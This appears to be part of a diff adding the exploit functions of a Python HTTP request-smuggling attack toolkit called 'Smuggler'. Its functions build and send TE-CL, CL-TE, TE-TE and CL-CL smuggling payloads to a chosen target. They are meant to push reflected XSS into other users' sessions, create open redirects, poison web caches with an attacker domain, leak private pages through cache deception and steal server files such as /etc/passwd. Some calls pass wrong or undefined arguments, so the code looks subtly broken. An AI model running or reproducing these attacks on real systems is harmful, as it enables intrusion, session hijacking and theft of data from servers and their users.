+    send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_xss():
+    print("\n"+"="*50 + "\n")
+    print("[Info] Trying to Re-Exploit a XSS Reflected (found in HTTP Headers) into other's sessions (NOT USER INTERACTION REQUIRED!)...")
+    target, port, SSL, method, path = set_target() # set target
+    addr = (target, port)
+    header = input("\n  + Enter VULNERABLE HEADER (ex: 'User-Agent'): ")
+    xss    = input("\n  + Enter XSS Injection (ex: '<script>alert(1)</script>'): ")
+    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
+    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
+    try:
+        content_length = int(content_length)
+    except:
+        content_length = 100
+    if not content_length:
+        content_length = 100
+    exploits_dsync = payloads.payloads.exploits # load exploits
+    for exp in exploits_dsync:
+        if "EXPLOIT-4" in exp: # extract exploit-4 (re-exploit XSS)
+            if request_type == "TE-CL":
+                if "TE-CL" in exp: # exploit 4 TE-CL
+                    exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
+            elif request_type == "CL-TE":
+                if "CL-TE" in exp: # exploit 4 CL-TE
+                    exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
+            elif request_type == "TE-TE":
+                if "TE-TE" in exp: # exploit 4 TE-TE
+                    exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
+            elif request_type == "CL-CL":
+                if "CL-CL" in exp: # exploit 4 CL-CL
+                    exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
+            else: # send all!
+                exploit = exp.split("#")[1]
+                exploit = exploit.replace("$method", method)
+                exploit = exploit.replace("$path", path)
+                exploit = exploit.replace("$target", target)
+                exploit = exploit.replace("$header", header)
+                exploit = exploit.replace("$xss", xss)
+                exploit = exploit.replace("$CL", str(content_length))
+                print("\n"+"="*50+"\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print(str(exploit))
+                send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL):
+    exploit = exp.split("#")[1]
+    exploit = exploit.replace("$method", method)
+    exploit = exploit.replace("$path", path)
+    exploit = exploit.replace("$target", target)
+    exploit = exploit.replace("$header", header)
+    exploit = exploit.replace("$xss", xss)
+    exploit = exploit.replace("$CL", str(content_length))
+    print("\n"+"="*50+"\n")
+    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+    print(str(exploit))
+    send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_openredirect():
+    print("\n"+"="*50 + "\n")
+    print("[Info] Trying to turn an on-site redirect into an Open-Redirect (ex: UFONet 'zombie')...")
+    target, port, SSL, method, path = set_target() # set target
+    addr = (target, port)
+    location = input("\n  + Enter NEW LOCATION (ex: 'otherwebsite.com'): ")
+    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
+    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
+    try:
+        content_length = int(content_length)
+    except:
+        content_length = 100
+    if not content_length:
+        content_length = 100
+    exploits_dsync = payloads.payloads.exploits # load exploits
+    for exp in exploits_dsync:
+        if "EXPLOIT-5" in exp: # extract exploit-5 (open-redirect)
+            if request_type == "TE-CL":
+                if "TE-CL" in exp: # exploit 5 TE-CL
+                    exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
+            elif request_type == "CL-TE":
+                if "CL-TE" in exp: # exploit 5 CL-TE
+                    exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
+            elif request_type == "TE-TE":
+                if "TE-TE" in exp: # exploit 5 TE-TE
+                    exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
+            elif request_type == "CL-CL":
+                if "CL-CL" in exp: # exploit 5 CL-CL
+                    exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
+            else: # send all!
+                exploit = exp.split("#")[1]
+                exploit = exploit.replace("$method", method)
+                exploit = exploit.replace("$path", path)
+                exploit = exploit.replace("$target", target)
+                exploit = exploit.replace("$location", location)
+                exploit = exploit.replace("$CL", str(content_length))
+                print("\n"+"="*50+"\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print(str(exploit))
+                send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_openredirect_armed(exploit, method, path, target, location, content_length, exp, addr, SSL):
+    exploit = exp.split("#")[1]
+    exploit = exploit.replace("$method", method)
+    exploit = exploit.replace("$path", path)
+    exploit = exploit.replace("$target", target)
+    exploit = exploit.replace("$location", location)
+    exploit = exploit.replace("$CL", str(content_length))
+    print("\n"+"="*50+"\n")
+    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+    print(str(exploit))
+    send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_poison():
+    print("\n"+"="*50 + "\n")
+    print("[Info] Trying to perform web cache poisoning...")
+    target, port, SSL, method, path = set_target() # set target
+    addr = (target, port)
+    location = input("\n  + Enter POISON DOMAIN/IP (ex: 'attacker-website.net'): ")
+    script   = input("\n  + Enter POISON SOURCE (ex: '/static/defaced.js'): ")
+    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
+    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
+    try:
+        content_length = int(content_length)
+    except:
+        content_length = 100
+    if not content_length:
+        content_length = 100
+    exploits_dsync = payloads.payloads.exploits # load exploits
+    for exp in exploits_dsync:
+        if "EXPLOIT-6" in exp: # extract exploit-6 (web cache poison)
+            if request_type == "TE-CL":
+                if "TE-CL" in exp: # exploit 6 TE-CL
+                    exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
+            elif request_type == "CL-TE":
+                if "CL-TE" in exp: # exploit 6 CL-TE
+                    exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
+            elif request_type == "TE-TE":
+                if "TE-TE" in exp: # exploit 6 TE-TE
+                    exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
+            elif request_type == "CL-CL":
+                if "CL-CL" in exp: # exploit 6 CL-CL
+                    exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
+            else: # send all!
+                exploit = exp.split("#")[1]
+                exploit = exploit.replace("$method", method)
+                exploit = exploit.replace("$path", path)
+                exploit = exploit.replace("$target", target)
+                exploit = exploit.replace("$location", location)
+                exploit = exploit.replace("$script", script)
+                exploit = exploit.replace("$CL", str(content_length))
+                print("\n"+"="*50+"\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print(str(exploit))
+                send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL):
+    exploit = exp.split("#")[1]
+    exploit = exploit.replace("$method", method)
+    exploit = exploit.replace("$path", path)
+    exploit = exploit.replace("$target", target)
+    exploit = exploit.replace("$location", location)
+    exploit = exploit.replace("$script", script)
+    exploit = exploit.replace("$CL", str(content_length))
+    print("\n"+"="*50+"\n")
+    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+    print(str(exploit))
+    send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_deception():
+    print("\n"+"="*50 + "\n")
+    print("[Info] Trying to perform web cache deception leaking...")
+    target, port, SSL, method, path = set_target() # set target
+    addr = (target, port)
+    private = input("\n  + Enter RESTRICTED ZONE (ex: '/private/messages'): ")
+    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
+    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
+    try:
+        content_length = int(content_length)
+    except:
+        content_length = 100
+    if not content_length:
+        content_length = 100
+    exploits_dsync = payloads.payloads.exploits # load exploits
+    for exp in exploits_dsync:
+        if "EXPLOIT-7" in exp: # extract exploit-7 (web cache deception)
+            if request_type == "TE-CL":
+                if "TE-CL" in exp: # exploit 7 TE-CL
+                    exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
+            elif request_type == "CL-TE":
+                if "CL-TE" in exp: # exploit 7 CL-TE
+                    exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
+            elif request_type == "TE-TE":
+                if "TE-TE" in exp: # exploit 7 TE-TE
+                    exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
+            elif request_type == "CL-CL":
+                if "CL-CL" in exp: # exploit 7 CL-CL
+                    exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
+            else: # send all!
+                exploit = exp.split("#")[1]
+                exploit = exploit.replace("$method", method)
+                exploit = exploit.replace("$path", path)
+                exploit = exploit.replace("$target", target)
+                exploit = exploit.replace("$private", private)
+                exploit = exploit.replace("$CL", str(content_length))
+                print("\n"+"="*50+"\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print(str(exploit))
+                send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL):
+    exploit = exp.split("#")[1]
+    exploit = exploit.replace("$method", method)
+    exploit = exploit.replace("$path", path)
+    exploit = exploit.replace("$target", target)
+    exploit = exploit.replace("$private", private)
+    exploit = exploit.replace("$CL", str(content_length))
+    print("\n"+"="*50+"\n")
+    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+    print(str(exploit))
+    send_exploit(addr, SSL, exploit) # send expoit
+
+def exploit_steal():
+    print("\n"+"="*50 + "\n")
+    print("[Info] Trying to steal files from server...")
+    target, port, SSL, method, path = set_target() # set target
+    addr = (target, port)
+    files = input("\n  + Enter FILE (ex: '/etc/passwd'): ")
+    exploits_dsync = payloads.payloads.exploits # load exploits
+    for exp in exploits_dsync:
+        if "EXPLOIT-0" in exp: # extract exploit-0 (steal files)
+            exploit = exp.split("#")[1]
+            exploit = exploit.replace("$method", method)
+            exploit = exploit.replace("$path", path)
+            exploit = exploit.replace("$target", target)
+            exploit = exploit.replace("$files", files)
+            content_length = len(files)+2 # p=len(files)
+            exploit = exploit.replace("$CL", str(content_length))
+            print("\n"+"="*50+"\n")
+            print("+ PAYLOAD MODE: [CL-CL]\n")
+            print(str(exploit))
+            send_exploit(addr, SSL, exploit) # send expoit
+
+def print_banner():
+    print("\n"+"="*50)
+    print(" ____  __  __ _   _  ____  ____ _     _____ ____  ")
+    print("/ ___||  \/  | | | |/ ___|/ ___| |   | ____|  _ \ ")
+    print("\___ \| |\/| | | | | |  _| |  _| |   |  _| | |_) |")
+    print(" ___) | |  | | |_| | |_| | |_| | |___| |___|  _ < ")
+    print("|____/|_|  |_|\___/ \____|\____|_____|_____|_| \_\ by psy")
+    print('\n"HTTP -Smuggling- (DSYNC) Attacking Toolkit"')
+    print("\n"+"-"*15+"\n")
+    print(" * VERSION: ")
+    print("   + "+VERSION+" - (rev:"+RELEASE+")")
+    print("\n * SOURCES:")
+    print("   + "+SOURCE1)
+    print("   + "+SOURCE2)
+    print("\n * CONTACT: ")
+    print("   + "+CONTACT+"\n")
+    print("-"*15+"\n")
+    print("="*50)
+
+# sub_init #
+print_banner() # show banner
+option = input("\n+ CHOOSE: (D)etect or (E)ploit: ").upper()
+print("\n"+"="*50)
+if option == "D": # detecting phase
+    detect()
+else: # trying to exploit
+    exploit()